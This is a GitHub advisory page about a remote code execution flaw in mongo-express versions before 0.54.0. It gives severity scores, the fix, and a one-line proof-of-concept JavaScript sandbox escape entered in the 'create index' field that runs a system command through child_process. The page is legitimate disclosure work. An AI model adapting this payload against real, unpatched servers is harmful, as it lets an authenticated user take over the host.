Lucene search

K
githubGitHub Advisory DatabaseGHSA-H47J-HC6X-H3QQ
HistoryDec 30, 2019 - 7:30 p.m.

Remote Code Execution Vulnerability in NPM mongo-express

2019-12-3019:30:31
CWE-78
GitHub Advisory Database
github.com
87

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

9 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

Impact

Remote code execution on the host machine by any authenticated user.

Proof Of Concept

Launching mongo-express on a Mac, pasting the following into the “create index” field will pop open the Mac calculator:

this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

Patches

Users should upgrade to version 0.54.0

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Snyk Security Advisory
CVE

For more information

If you have any questions or comments about this advisory:

Thanks

@JLLeitschuh for finding and reporting this vulnerability

CPENameOperatorVersion
mongo-expresslt0.54.0

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

9 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%